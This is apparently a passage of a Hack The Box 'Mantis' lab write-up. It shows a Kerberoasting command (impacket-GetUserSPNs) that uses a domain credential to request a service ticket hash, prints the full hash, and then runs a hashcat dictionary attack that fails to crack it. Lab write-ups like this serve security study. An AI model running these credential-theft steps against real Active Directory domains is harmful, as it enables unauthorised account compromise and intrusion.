impacket-GetUserSPNs
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-GetUserSPNs htb.local/james@$IP -target-domain htb.local -dc-ip $IP -usersfile users -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
password:
[-] CCache file is not found. Skipping...
[-] principal: james - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] principal: administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*mantis$HTB.LOCAL$mantis*$c2e3fc96010a456b84b80987fd37bad4$583a5b3a8bc1f9ca0c32d16d18af995284da7a3e94afbff03ac17d6c4a7cc64f537b2f3ed92285a1a9563ac212d8fceac9753e3710017a4f757ba83982af6a63a47d39847353015de72861383eee3e2bddd43783c91112bb72684c832bf6769f59f3a4cbd8966a5b5ca9c105c7efc7abdcbcae05290df7e2a38750a5f6dfb3b8b80abb6169f6f5e4c20ed3b6f58c0c69bf1b58d605f192fa0879cf3c89649aa5baebd988dbfb4b3c3e9ea5e62149b5cf2dff888c8ba9e59968e8488c1355ee7595ed44fdac3c7a865085bade23a315c4f30a8ad649a521855369f5198c333513ed6a086589682ccca626ea42803b5e2ea3be080d8d3a79f735f03ede5ef3d93c848466a9f5ea459c76aa373a7204b54618787815389a97cac42b00fd8a1ee0caeb0b799bc44523da5a0c91df5c948bca2876f90bf3082ab7bc68c1a0f816d4c04b396c595a48a757bf8337f08084135bb5cbec5efcb248c33e7f0b275490d7136f92e20b8b890b2c01018c6f7580bc1d13d29b0a8db5809772591d40814b72ddb1f9941ba84b5c501f0fda832d75e278f492e351e25bcda165cdb6e447b68f42c0b488a347dea322615cbc5e2dacf9ab5ed1d12395c23d1da825dfc269d695c7185f948da3106ad5df7855dfb95d3f9d14ef7d2dac332ce5438083bb7f9a1f4d122a012c057eda50614e85f48caccff190c158af7b95f791102c27a27209cf3a6e32e655f77b908f9239811f5333657abecb3b54dd38c93ae4401fc4bf6dad3eb10f50717966c1fa969a31bcc63386ac9e6b4cf1d972aa45b29de18dd6044b76d86027b4c53e22624d3b4f72e1fdeb0f1f494b84227994307aea804e5fdc5cd815e31e4958b0356234e66199cb980ce922f3ba050fcc5dd9c32f46bf273862c25888315bf6749f1f21019360872f3ea16359fe0a5eb2373af163829c381a1269c2c4d370ec0401c305ea3131561dfcfbbbc5975fb7c80b2670543f32dfdc43cbfe515e66d50eecba5a403bbb01ba94c2d0e625a22b0b936d7afcdc6a694cb67b6d5a4f02c58c6464b29a21e8627b7299c256b35bd90ce0858a12df09cb96476f45ffbfb19bf1483458a4efc377dc3e12e0c6cffac1fb93e79d62135de3da987ddf8f454f92d93cb6ef0aece95250aa4a8a7d71557de7e27a5b6d15735cabcb71431e613f5935d81cef65bfbc4bb3529f0277d967796961bb5e0dab49d83317f074300b83222129
[-] principal: admin - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)Now that I have a valid domain credential, I am able to kerberoast the mantis user for the TGS ticket hash,
The mantis user is likely the machine account for the target host
ps c:\hashcat-6.2.6> .\hashcat.exe -a 0 -m 13100 .\hashes .\rockyou.txt -d 2 -O --self-test-diable
hashcat (v6.2.6) starting
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
watchdog: Temperature abort trigger set to 90c
host memory required for this attack: 263 MB
dictionary cache hit:
* filename..: .\rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
Approaching final keyspace - workload adjusted.
session..........: hashcat
status...........: Exhausted
hash.mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
hash.target......: $krb5tgs$23$*mantis$HTB.LOCAL$mantis*$c2e3fc96010a4...222129
time.started.....: Tue Jan 10 18:28:05 2023 (1 sec)
time.estimated...: Tue Jan 10 18:28:06 2023 (0 secs)
kernel.feature...: Optimized Kernel
guess.base.......: File (.\rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#2.........: 18987.8 kH/s (1.99ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
progress.........: 14344385/14344385 (100.00%)
rejected.........: 3094/14344385 (0.02%)
restore.point....: 14344385/14344385 (100.00%)
restore.sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#2....: $HEX[30383433333532373937] -> $HEX[042a0337c2a156616d6f732103]
hardware.mon.#2..: Temp: 57c Util: 30% Core:1800MHz Mem:6000MHz Bus:8
started: Tue Jan 10 18:28:04 2023
stopped: Tue Jan 10 18:28:06 2023
ps c:\Users\tacticalgator\Tools\hashcat-6.2.6>Hashcat was unable to crack the TGS ticket hash